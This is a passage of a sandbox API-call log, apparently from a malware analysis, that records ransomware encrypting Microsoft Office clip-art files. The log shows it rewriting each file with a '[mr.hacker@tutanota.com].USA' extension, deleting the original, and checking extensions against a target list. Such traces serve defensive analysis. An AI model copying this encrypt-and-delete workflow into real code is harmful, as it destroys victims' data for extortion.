-1 [0058.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63 [0058.196] lstrlenW (lpString=".jpg") returned 4 [0058.196] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.124] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=19476) returned 1 [0060.125] CloseHandle (hObject=0x1ec) returned 1 [0060.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 0x20 [0060.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.125] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.125] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.126] GetLastError () returned 0x0 [0060.126] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x4c14, lpOverlapped=0x0) returned 1 [0060.127] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4c20, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4c20, lpOverlapped=0x0) returned 1 [0060.128] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.128] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.128] SetEndOfFile (hFile=0x248) returned 1 [0060.128] CloseHandle (hObject=0x248) returned 1 [0060.129] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.129] SetEndOfFile (hFile=0x1ec) returned 1 [0060.129] CloseHandle (hObject=0x1ec) returned 1 [0060.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf")) returned 1 [0060.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.130] lstrlenW (lpString=".doc") returned 4 [0060.130] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.130] lstrlenW (lpString=".docx") returned 5 [0060.130] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.130] lstrlenW (lpString=".pdf") returned 4 [0060.130] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.130] lstrlenW (lpString=".xls") returned 4 [0060.130] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.130] lstrlenW (lpString=".xlsx") returned 5 [0060.130] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.130] lstrlenW (lpString=".ppt") returned 4 [0060.130] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.130] lstrlenW (lpString=".zip") returned 4 [0060.130] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.130] lstrlenW (lpString=".rar") returned 4 [0060.130] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.130] lstrlenW (lpString=".bz2") returned 4 [0060.130] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.130] lstrlenW (lpString=".7z") returned 3 [0060.130] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.130] lstrlenW (lpString=".dbf") returned 4 [0060.130] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.131] lstrlenW (lpString=".1cd") returned 4 [0060.131] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 63 [0060.131] lstrlenW (lpString=".jpg") returned 4 [0060.131] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.131] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1712) returned 1 [0060.131] CloseHandle (hObject=0x1ec) returned 1 [0060.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 0x20 [0060.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.132] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.132] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.132] GetLastError () returned 0x0 [0060.132] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x6b0, lpOverlapped=0x0) returned 1 [0060.134] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x6c0, lpOverlapped=0x0) returned 1 [0060.135] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.135] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.135] SetEndOfFile (hFile=0x248) returned 1 [0060.135] CloseHandle (hObject=0x248) returned 1 [0060.135] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.135] SetEndOfFile (hFile=0x1ec) returned 1 [0060.136] CloseHandle (hObject=0x1ec) returned 1 [0060.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.136] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0060.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.136] lstrlenW (lpString=".doc") returned 4 [0060.136] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.136] lstrlenW (lpString=".docx") returned 5 [0060.136] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.136] lstrlenW (lpString=".pdf") returned 4 [0060.136] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.136] lstrlenW (lpString=".xls") returned 4 [0060.136] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.136] lstrlenW (lpString=".xlsx") returned 5 [0060.136] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.136] lstrlenW (lpString=".ppt") returned 4 [0060.136] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.137] lstrlenW (lpString=".zip") returned 4 [0060.137] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.137] lstrlenW (lpString=".rar") returned 4 [0060.137] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.137] lstrlenW (lpString=".bz2") returned 4 [0060.137] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.137] lstrlenW (lpString=".7z") returned 3 [0060.137] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.137] lstrlenW (lpString=".dbf") returned 4 [0060.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.137] lstrlenW (lpString=".1cd") returned 4 [0060.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 63 [0060.137] lstrlenW (lpString=".jpg") returned 4 [0060.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.137] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=8366) returned 1 [0060.137] CloseHandle (hObject=0x1ec) returned 1 [0060.137] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 0x20 [0060.137] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.138] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.138] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.138] GetLastError () returned 0x0 [0060.138] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x20ae, lpOverlapped=0x0) returned 1 [0060.140] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x20b0, lpOverlapped=0x0) returned 1 [0060.140] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.140] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.141] SetEndOfFile (hFile=0x248) returned 1 [0060.141] CloseHandle (hObject=0x248) returned 1 [0060.141] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.141] SetEndOfFile (hFile=0x1ec) returned 1 [0060.142] CloseHandle (hObject=0x1ec) returned 1 [0060.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0060.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.142] lstrlenW (lpString=".doc") returned 4 [0060.142] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.142] lstrlenW (lpString=".docx") returned 5 [0060.142] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.142] lstrlenW (lpString=".pdf") returned 4 [0060.142] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.142] lstrlenW (lpString=".xls") returned 4 [0060.142] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.142] lstrlenW (lpString=".xlsx") returned 5 [0060.142] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.142] lstrlenW (lpString=".ppt") returned 4 [0060.142] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.143] lstrlenW (lpString=".zip") returned 4 [0060.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.143] lstrlenW (lpString=".rar") returned 4 [0060.143] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.143] lstrlenW (lpString=".bz2") returned 4 [0060.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.143] lstrlenW (lpString=".7z") returned 3 [0060.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.143] lstrlenW (lpString=".dbf") returned 4 [0060.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.143] lstrlenW (lpString=".1cd") returned 4 [0060.143] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0060.143] lstrlenW (lpString=".jpg") returned 4 [0060.143] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.143] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=4976) returned 1 [0060.143] CloseHandle (hObject=0x1ec) returned 1 [0060.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 0x20 [0060.143] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.144] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.144] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.144] GetLastError () returned 0x0 [0060.144] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1370, lpOverlapped=0x0) returned 1 [0060.146] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1380, lpOverlapped=0x0) returned 1 [0060.146] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.146] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.147] SetEndOfFile (hFile=0x248) returned 1 [0060.147] CloseHandle (hObject=0x248) returned 1 [0060.147] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.147] SetEndOfFile (hFile=0x1ec) returned 1 [0060.148] CloseHandle (hObject=0x1ec) returned 1 [0060.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0060.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.148] lstrlenW (lpString=".doc") returned 4 [0060.148] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.148] lstrlenW (lpString=".docx") returned 5 [0060.148] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.148] lstrlenW (lpString=".pdf") returned 4 [0060.148] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.148] lstrlenW (lpString=".xls") returned 4 [0060.148] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.148] lstrlenW (lpString=".xlsx") returned 5 [0060.148] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.148] lstrlenW (lpString=".ppt") returned 4 [0060.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.148] lstrlenW (lpString=".zip") returned 4 [0060.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.148] lstrlenW (lpString=".rar") returned 4 [0060.149] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.149] lstrlenW (lpString=".bz2") returned 4 [0060.149] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.149] lstrlenW (lpString=".7z") returned 3 [0060.149] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.149] lstrlenW (lpString=".dbf") returned 4 [0060.149] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.149] lstrlenW (lpString=".1cd") returned 4 [0060.149] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 63 [0060.149] lstrlenW (lpString=".jpg") returned 4 [0060.149] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.150] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=12788) returned 1 [0060.150] CloseHandle (hObject=0x1ec) returned 1 [0060.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf")) returned 0x20 [0060.150] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0060.150] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.150] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0060.150] GetLastError () returned 0x0 [0060.151] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x31f4, lpOverlapped=0x0) returned 1 [0060.152] WriteFile (in: hFile=0x248, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x3200, lpOverlapped=0x0) returned 1 [0060.153] ReadFile (in: hFile=0x1ec, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, 